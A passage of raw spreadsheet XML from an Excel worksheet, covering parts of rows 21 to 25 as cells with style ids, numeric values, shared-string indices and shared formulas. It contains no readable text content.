      <c r="AM21" s="101"/>
      <c r="AN21" s="101"/>
      <c r="AO21" s="101"/>
      <c r="AP21" s="80"/>
      <c r="AQ21" s="80"/>
      <c r="AR21" s="80"/>
      <c r="AS21" s="80">
        <v>1.0</v>
      </c>
      <c r="AT21" s="80"/>
      <c r="AU21" s="80"/>
      <c r="AV21" s="80"/>
      <c r="AW21" s="80"/>
      <c r="AX21" s="80"/>
      <c r="AY21" s="80"/>
      <c r="AZ21" s="81">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="BA21" s="102" t="s">
        <v>339</v>
      </c>
      <c r="BB21" s="82">
        <v>2.0</v>
      </c>
      <c r="BC21" s="82">
        <v>3.0</v>
      </c>
      <c r="BD21" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE21" s="102" t="s">
        <v>339</v>
      </c>
      <c r="BF21" s="102"/>
      <c r="BG21" s="102"/>
      <c r="BH21" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI21" s="102"/>
      <c r="BJ21" s="102"/>
      <c r="BK21" s="102"/>
      <c r="BL21" s="102"/>
      <c r="BM21" s="103"/>
      <c r="BN21" s="103"/>
      <c r="BO21" s="103"/>
      <c r="BP21" s="83">
        <v>1.0</v>
      </c>
      <c r="BQ21" s="83"/>
      <c r="BR21" s="83"/>
      <c r="BS21" s="83"/>
      <c r="BT21" s="83"/>
      <c r="BU21" s="83"/>
      <c r="BV21" s="83"/>
      <c r="BW21" s="84">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="BX21" s="105" t="s">
        <v>340</v>
      </c>
      <c r="BY21" s="85">
        <v>3.0</v>
      </c>
      <c r="BZ21" s="85">
        <v>7.0</v>
      </c>
      <c r="CA21" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB21" s="105" t="s">
        <v>340</v>
      </c>
      <c r="CC21" s="105"/>
      <c r="CD21" s="105"/>
      <c r="CE21" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF21" s="105"/>
      <c r="CG21" s="105"/>
      <c r="CH21" s="105"/>
      <c r="CI21" s="105"/>
      <c r="CJ21" s="106"/>
      <c r="CK21" s="106"/>
      <c r="CL21" s="106"/>
      <c r="CM21" s="86">
        <v>1.0</v>
      </c>
      <c r="CN21" s="86"/>
      <c r="CO21" s="86"/>
      <c r="CP21" s="86"/>
      <c r="CQ21" s="86"/>
      <c r="CR21" s="86"/>
      <c r="CS21" s="86"/>
      <c r="CT21" s="87">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="CU21" s="88" t="s">
        <v>341</v>
      </c>
      <c r="CV21" s="88">
        <v>6.0</v>
      </c>
      <c r="CW21" s="88">
        <v>63.0</v>
      </c>
      <c r="CX21" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CY21" s="88" t="s">
        <v>342</v>
      </c>
      <c r="CZ21" s="88"/>
      <c r="DA21" s="88"/>
      <c r="DB21" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC21" s="88"/>
      <c r="DD21" s="88"/>
      <c r="DE21" s="88"/>
      <c r="DF21" s="88"/>
      <c r="DG21" s="89"/>
      <c r="DH21" s="89"/>
      <c r="DI21" s="89"/>
      <c r="DJ21" s="89">
        <v>1.0</v>
      </c>
      <c r="DK21" s="89"/>
      <c r="DL21" s="89"/>
      <c r="DM21" s="89"/>
      <c r="DN21" s="89"/>
      <c r="DO21" s="89"/>
      <c r="DP21" s="89"/>
      <c r="DQ21" s="90">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="DR21" s="91"/>
      <c r="DS21" s="92" t="s">
        <v>343</v>
      </c>
      <c r="DT21" s="93">
        <v>2.0</v>
      </c>
      <c r="DU21" s="93">
        <v>3.0</v>
      </c>
      <c r="DV21" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW21" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX21" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY21" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ21" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA21" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB21" s="74">
        <v>1.0</v>
      </c>
      <c r="EC21" s="74">
        <v>1.0</v>
      </c>
      <c r="ED21" s="95">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="EE21" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="22" ht="153.75" customHeight="1">
      <c r="B22" s="111" t="s">
        <v>261</v>
      </c>
      <c r="C22" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D22" s="72" t="s">
        <v>263</v>
      </c>
      <c r="E22" s="72" t="s">
        <v>332</v>
      </c>
      <c r="F22" s="72" t="s">
        <v>333</v>
      </c>
      <c r="G22" s="72" t="s">
        <v>182</v>
      </c>
      <c r="H22" s="72" t="s">
        <v>344</v>
      </c>
      <c r="I22" s="73" t="s">
        <v>345</v>
      </c>
      <c r="J22" s="73" t="s">
        <v>346</v>
      </c>
      <c r="K22" s="73" t="s">
        <v>347</v>
      </c>
      <c r="L22" s="74">
        <v>58.0</v>
      </c>
      <c r="M22" s="74">
        <v>1.0</v>
      </c>
      <c r="N22" s="74">
        <v>1.0</v>
      </c>
      <c r="O22" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P22" s="74">
        <v>1.0</v>
      </c>
      <c r="Q22" s="74">
        <v>0.0</v>
      </c>
      <c r="R22" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S22" s="112" t="s">
        <v>348</v>
      </c>
      <c r="T22" s="76" t="s">
        <v>189</v>
      </c>
      <c r="U22" s="77" t="s">
        <v>349</v>
      </c>
      <c r="V22" s="76" t="s">
        <v>191</v>
      </c>
      <c r="W22" s="109"/>
      <c r="X22" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y22" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z22" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA22" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB22" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC22" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD22" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE22" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF22" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG22" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH22" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI22" s="78"/>
      <c r="AJ22" s="78"/>
      <c r="AK22" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL22" s="78"/>
      <c r="AM22" s="78"/>
      <c r="AN22" s="78"/>
      <c r="AO22" s="78"/>
      <c r="AP22" s="80"/>
      <c r="AQ22" s="80"/>
      <c r="AR22" s="80"/>
      <c r="AS22" s="80">
        <v>0.0</v>
      </c>
      <c r="AT22" s="80"/>
      <c r="AU22" s="80"/>
      <c r="AV22" s="80"/>
      <c r="AW22" s="80"/>
      <c r="AX22" s="80"/>
      <c r="AY22" s="80"/>
      <c r="AZ22" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA22" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB22" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC22" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD22" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE22" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF22" s="82"/>
      <c r="BG22" s="82"/>
      <c r="BH22" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI22" s="82"/>
      <c r="BJ22" s="82"/>
      <c r="BK22" s="82"/>
      <c r="BL22" s="82"/>
      <c r="BM22" s="83"/>
      <c r="BN22" s="83"/>
      <c r="BO22" s="83"/>
      <c r="BP22" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ22" s="83"/>
      <c r="BR22" s="83"/>
      <c r="BS22" s="83"/>
      <c r="BT22" s="83"/>
      <c r="BU22" s="83"/>
      <c r="BV22" s="83"/>
      <c r="BW22" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX22" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY22" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ22" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA22" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB22" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC22" s="85"/>
      <c r="CD22" s="85"/>
      <c r="CE22" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF22" s="85"/>
      <c r="CG22" s="85"/>
      <c r="CH22" s="85"/>
      <c r="CI22" s="85"/>
      <c r="CJ22" s="86"/>
      <c r="CK22" s="86"/>
      <c r="CL22" s="86"/>
      <c r="CM22" s="86">
        <v>0.0</v>
      </c>
      <c r="CN22" s="86"/>
      <c r="CO22" s="86"/>
      <c r="CP22" s="86"/>
      <c r="CQ22" s="86"/>
      <c r="CR22" s="86"/>
      <c r="CS22" s="86"/>
      <c r="CT22" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU22" s="88" t="s">
        <v>192</v>
      </c>
      <c r="CV22" s="88">
        <v>3.0</v>
      </c>
      <c r="CW22" s="88">
        <v>20.0</v>
      </c>
      <c r="CX22" s="79" t="s">
        <v>350</v>
      </c>
      <c r="CY22" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ22" s="88"/>
      <c r="DA22" s="88"/>
      <c r="DB22" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC22" s="88"/>
      <c r="DD22" s="88"/>
      <c r="DE22" s="88"/>
      <c r="DF22" s="88"/>
      <c r="DG22" s="89"/>
      <c r="DH22" s="89"/>
      <c r="DI22" s="89"/>
      <c r="DJ22" s="89">
        <v>0.0</v>
      </c>
      <c r="DK22" s="89"/>
      <c r="DL22" s="89"/>
      <c r="DM22" s="89"/>
      <c r="DN22" s="89"/>
      <c r="DO22" s="89"/>
      <c r="DP22" s="89"/>
      <c r="DQ22" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR22" s="91"/>
      <c r="DS22" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT22" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU22" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV22" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW22" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX22" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY22" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ22" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA22" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB22" s="74">
        <v>5.0</v>
      </c>
      <c r="EC22" s="74">
        <v>0.0</v>
      </c>
      <c r="ED22" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE22" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="23" ht="153.75" customHeight="1">
      <c r="B23" s="111" t="s">
        <v>261</v>
      </c>
      <c r="C23" s="72" t="s">
        <v>351</v>
      </c>
      <c r="D23" s="72" t="s">
        <v>263</v>
      </c>
      <c r="E23" s="72" t="s">
        <v>352</v>
      </c>
      <c r="F23" s="72" t="s">
        <v>353</v>
      </c>
      <c r="G23" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H23" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I23" s="73" t="s">
        <v>354</v>
      </c>
      <c r="J23" s="73" t="s">
        <v>355</v>
      </c>
      <c r="K23" s="73" t="s">
        <v>356</v>
      </c>
      <c r="L23" s="74">
        <v>85.0</v>
      </c>
      <c r="M23" s="74">
        <v>1.0</v>
      </c>
      <c r="N23" s="74">
        <v>1.0</v>
      </c>
      <c r="O23" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P23" s="74">
        <v>1.0</v>
      </c>
      <c r="Q23" s="74">
        <v>0.0</v>
      </c>
      <c r="R23" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S23" s="76" t="s">
        <v>357</v>
      </c>
      <c r="T23" s="76" t="s">
        <v>358</v>
      </c>
      <c r="U23" s="77" t="s">
        <v>359</v>
      </c>
      <c r="V23" s="76" t="s">
        <v>191</v>
      </c>
      <c r="W23" s="109"/>
      <c r="X23" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y23" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z23" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA23" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB23" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC23" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD23" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE23" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF23" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG23" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH23" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI23" s="78"/>
      <c r="AJ23" s="78"/>
      <c r="AK23" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL23" s="78"/>
      <c r="AM23" s="78"/>
      <c r="AN23" s="78"/>
      <c r="AO23" s="78"/>
      <c r="AP23" s="80"/>
      <c r="AQ23" s="80"/>
      <c r="AR23" s="80"/>
      <c r="AS23" s="80">
        <v>0.0</v>
      </c>
      <c r="AT23" s="80"/>
      <c r="AU23" s="80"/>
      <c r="AV23" s="80"/>
      <c r="AW23" s="80"/>
      <c r="AX23" s="80"/>
      <c r="AY23" s="80"/>
      <c r="AZ23" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA23" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB23" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC23" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD23" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE23" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF23" s="82"/>
      <c r="BG23" s="82"/>
      <c r="BH23" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI23" s="82"/>
      <c r="BJ23" s="82"/>
      <c r="BK23" s="82"/>
      <c r="BL23" s="82"/>
      <c r="BM23" s="83"/>
      <c r="BN23" s="83"/>
      <c r="BO23" s="83"/>
      <c r="BP23" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ23" s="83"/>
      <c r="BR23" s="83"/>
      <c r="BS23" s="83"/>
      <c r="BT23" s="83"/>
      <c r="BU23" s="83"/>
      <c r="BV23" s="83"/>
      <c r="BW23" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX23" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY23" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ23" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA23" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB23" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC23" s="85"/>
      <c r="CD23" s="85"/>
      <c r="CE23" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF23" s="85"/>
      <c r="CG23" s="85"/>
      <c r="CH23" s="85"/>
      <c r="CI23" s="85"/>
      <c r="CJ23" s="86"/>
      <c r="CK23" s="86"/>
      <c r="CL23" s="86"/>
      <c r="CM23" s="86">
        <v>0.0</v>
      </c>
      <c r="CN23" s="86"/>
      <c r="CO23" s="86"/>
      <c r="CP23" s="86"/>
      <c r="CQ23" s="86"/>
      <c r="CR23" s="86"/>
      <c r="CS23" s="86"/>
      <c r="CT23" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU23" s="88" t="s">
        <v>360</v>
      </c>
      <c r="CV23" s="88">
        <v>3.0</v>
      </c>
      <c r="CW23" s="88">
        <v>43.0</v>
      </c>
      <c r="CX23" s="79" t="s">
        <v>361</v>
      </c>
      <c r="CY23" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ23" s="88"/>
      <c r="DA23" s="88"/>
      <c r="DB23" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC23" s="88"/>
      <c r="DD23" s="88"/>
      <c r="DE23" s="88"/>
      <c r="DF23" s="88"/>
      <c r="DG23" s="89"/>
      <c r="DH23" s="89"/>
      <c r="DI23" s="89"/>
      <c r="DJ23" s="89">
        <v>0.0</v>
      </c>
      <c r="DK23" s="89"/>
      <c r="DL23" s="89"/>
      <c r="DM23" s="89"/>
      <c r="DN23" s="89"/>
      <c r="DO23" s="89"/>
      <c r="DP23" s="89"/>
      <c r="DQ23" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR23" s="91"/>
      <c r="DS23" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT23" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU23" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV23" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW23" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX23" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY23" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ23" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA23" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB23" s="74">
        <v>83.0</v>
      </c>
      <c r="EC23" s="74">
        <v>0.0</v>
      </c>
      <c r="ED23" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE23" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="24" ht="153.75" customHeight="1">
      <c r="B24" s="111" t="s">
        <v>261</v>
      </c>
      <c r="C24" s="72" t="s">
        <v>351</v>
      </c>
      <c r="D24" s="72" t="s">
        <v>263</v>
      </c>
      <c r="E24" s="72" t="s">
        <v>352</v>
      </c>
      <c r="F24" s="72" t="s">
        <v>353</v>
      </c>
      <c r="G24" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H24" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I24" s="73" t="s">
        <v>362</v>
      </c>
      <c r="J24" s="73" t="s">
        <v>363</v>
      </c>
      <c r="K24" s="73" t="s">
        <v>364</v>
      </c>
      <c r="L24" s="74">
        <v>11.0</v>
      </c>
      <c r="M24" s="74">
        <v>1.0</v>
      </c>
      <c r="N24" s="74">
        <v>1.0</v>
      </c>
      <c r="O24" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P24" s="74">
        <v>1.0</v>
      </c>
      <c r="Q24" s="74">
        <v>0.0</v>
      </c>
      <c r="R24" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S24" s="76" t="s">
        <v>365</v>
      </c>
      <c r="T24" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U24" s="77" t="s">
        <v>366</v>
      </c>
      <c r="V24" s="76" t="s">
        <v>367</v>
      </c>
      <c r="W24" s="76" t="s">
        <v>12</v>
      </c>
      <c r="X24" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y24" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z24" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA24" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB24" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC24" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD24" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE24" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF24" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG24" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH24" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI24" s="78"/>
      <c r="AJ24" s="78"/>
      <c r="AK24" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL24" s="78"/>
      <c r="AM24" s="78"/>
      <c r="AN24" s="78"/>
      <c r="AO24" s="78"/>
      <c r="AP24" s="80"/>
      <c r="AQ24" s="80"/>
      <c r="AR24" s="80"/>
      <c r="AS24" s="80">
        <v>0.0</v>
      </c>
      <c r="AT24" s="80"/>
      <c r="AU24" s="80"/>
      <c r="AV24" s="80"/>
      <c r="AW24" s="80"/>
      <c r="AX24" s="80"/>
      <c r="AY24" s="80"/>
      <c r="AZ24" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA24" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB24" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC24" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD24" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE24" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF24" s="82"/>
      <c r="BG24" s="82"/>
      <c r="BH24" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI24" s="82"/>
      <c r="BJ24" s="82"/>
      <c r="BK24" s="82"/>
      <c r="BL24" s="82"/>
      <c r="BM24" s="83"/>
      <c r="BN24" s="83"/>
      <c r="BO24" s="83"/>
      <c r="BP24" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ24" s="83"/>
      <c r="BR24" s="83"/>
      <c r="BS24" s="83"/>
      <c r="BT24" s="83"/>
      <c r="BU24" s="83"/>
      <c r="BV24" s="83"/>
      <c r="BW24" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX24" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY24" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ24" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA24" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB24" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC24" s="85"/>
      <c r="CD24" s="85"/>
      <c r="CE24" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF24" s="85"/>
      <c r="CG24" s="85"/>
      <c r="CH24" s="85"/>
      <c r="CI24" s="85"/>
      <c r="CJ24" s="86"/>
      <c r="CK24" s="86"/>
      <c r="CL24" s="86"/>
      <c r="CM24" s="86">
        <v>0.0</v>
      </c>
      <c r="CN24" s="86"/>
      <c r="CO24" s="86"/>
      <c r="CP24" s="86"/>
      <c r="CQ24" s="86"/>
      <c r="CR24" s="86"/>
      <c r="CS24" s="86"/>
      <c r="CT24" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU24" s="88" t="s">
        <v>360</v>
      </c>
      <c r="CV24" s="88">
        <v>3.0</v>
      </c>
      <c r="CW24" s="88">
        <v>8.0</v>
      </c>
      <c r="CX24" s="79" t="s">
        <v>361</v>
      </c>
      <c r="CY24" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ24" s="88"/>
      <c r="DA24" s="88"/>
      <c r="DB24" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC24" s="88"/>
      <c r="DD24" s="88"/>
      <c r="DE24" s="88"/>
      <c r="DF24" s="88"/>
      <c r="DG24" s="89"/>
      <c r="DH24" s="89"/>
      <c r="DI24" s="89"/>
      <c r="DJ24" s="89">
        <v>0.0</v>
      </c>
      <c r="DK24" s="89"/>
      <c r="DL24" s="89"/>
      <c r="DM24" s="89"/>
      <c r="DN24" s="89"/>
      <c r="DO24" s="89"/>
      <c r="DP24" s="89"/>
      <c r="DQ24" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR24" s="91"/>
      <c r="DS24" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT24" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU24" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV24" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW24" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX24" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY24" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ24" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA24" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB24" s="74">
        <v>11.0</v>
      </c>
      <c r="EC24" s="74">
        <v>0.0</v>
      </c>
      <c r="ED24" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE24" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="25" ht="208.5" customHeight="1">
      <c r="B25" s="111" t="s">
        <v>261</v>
      </c>
      <c r="C25" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D25" s="72" t="s">
        <v>263</v>
      </c>
      <c r="E25" s="72" t="s">
        <v>368</v>
      </c>
      <c r="F25" s="72" t="s">
        <v>369</v>
      </c>
      <c r="G25" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H25" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I25" s="73" t="s">
        <v>370</v>
      </c>
      <c r="J25" s="73" t="s">
        <v>371</v>
      </c>
      <c r="K25" s="73" t="s">
        <v>372</v>
      </c>
      <c r="L25" s="74">
        <v>17.0</v>
      </c>
      <c r="M25" s="74">
        <v>1.0</v>
      </c>
      <c r="N25" s="74">
        <v>1.0</v>
      </c>
      <c r="O25" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P25" s="74">
        <v>1.0</v>
      </c>
      <c r="Q25" s="74">
        <v>0.0</v>
      </c>
      <c r="R25" s="75" t="s">
        <v>373</v>
      </c>
      <c r="S25" s="76" t="s">
        <v>374</v>
      </c>
      <c r="T25" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U25" s="77" t="s">
        <v>375</v>
      </c>
      <c r="V25" s="76" t="s">
        <v>376</v>
      </c>
      <c r="W25" s="76" t="s">
        <v>377</v>
      </c>
      <c r="X25" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y25" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z25" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA25" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB25" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC25" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD25" s="78">
        <v>1448.0</v>
      </c>
      <c r="AE25" s="78">
        <v>1.0</v>
      </c>
      <c r="AF25" s="78">
        <v>2.0</v>
      </c>
      <c r="AG25" s="114" t="s">
        <v>12</v>
      </c>
      <c r="AH25" s="78">
        <v>1448.0</v>
      </c>
      <c r="AI25" s="78"/>
      <c r="AJ25" s="78"/>
      <c r="AK25" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL25" s="78"/>
      <c r="AM25" s="78"/>
      <c r="AN25" s="78"/>
      <c r="AO25" s="78"/>
      <c r="AP25" s="80"/>
      <c r="AQ25" s="80"/>
      <c r="AR25" s="80"/>
      <c r="AS25" s="80">
        <v>0.0</v>
      </c>
      <c r="AT25" s="80"/>
      <c r="AU25" s="80"/>
      <c r="AV25" s="80"/>
      <c r="AW25" s="80"/>
      <c r="AX25" s="80"/>
      <c r="AY25" s="80"/>
      <c r="AZ25" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA25" s="82" t="s">
        <v>378</v>
      </c>
      <c r="BB25" s="82">
        <v>2.0</v>
      </c>
      <c r="BC25" s="82">
        <v>4.0</v>
      </c>
      <c r="BD25" s="114" t="s">
        <v>12</v>
      </c>
      <c r="BE25" s="82" t="s">
        <v>379</v>
      </c>
      <c r="BF25" s="82"/>
      <c r="BG25" s="82"/>
      <c r="BH25" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI25" s="82"/>
      <c r="BJ25" s="82"/>
      <c r="BK25" s="82"/>
      <c r="BL25" s="82"/>
      <c r="BM25" s="83"/>
      <c r="BN25" s="83"/>
      <c r="BO25" s="83"/>
      <c r="BP25" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ25" s="83"/>
      <c r="BR25" s="83"/>
      <c r="BS25" s="83"/>
      <c r="BT25" s="83"/>
      <c r="BU25" s="83"/>
      <c r="BV25" s="83"/>
      <c r="BW25" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX25" s="85" t="s">
        <v>380</v>
      </c>
      <c r="BY25" s="85">
        <v>2.0</v>
      </c>
      <c r="BZ25" s="85">
        <v>4.0</v>
      </c>
      <c r="CA25" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB25" s="85" t="s">
        <v>381</v>
      </c>
      <c r="CC25" s="85"/>
      <c r="CD25" s="85"/>
      <c r="CE25" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF25" s="85"/>
      <c r="CG25" s="85"/>
      <c r="CH25" s="85"/>
      <c r="CI25" s="85"/>
      <c r="CJ25" s="86"/>
      <c r="CK25" s="86"/>
      <c r="CL25" s="86"/>
      <c r="CM25" s="86">
        <v>0.0</v>
      </c>
      <c r="CN25" s="86"/>
      <c r="CO25" s="86"/>
      <c r="CP25" s="86"/>
      <c r="CQ25" s="86"/>
      <c r="CR25" s="86"/>
      <c r="CS25" s="86"/>
      <c r="CT25" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU25" s="88" t="s">
        <v>382</v>
      </c>
      <c r="CV25" s="88">
        <v>12.0</v>
      </c>
      <c r="CW25" s="88">
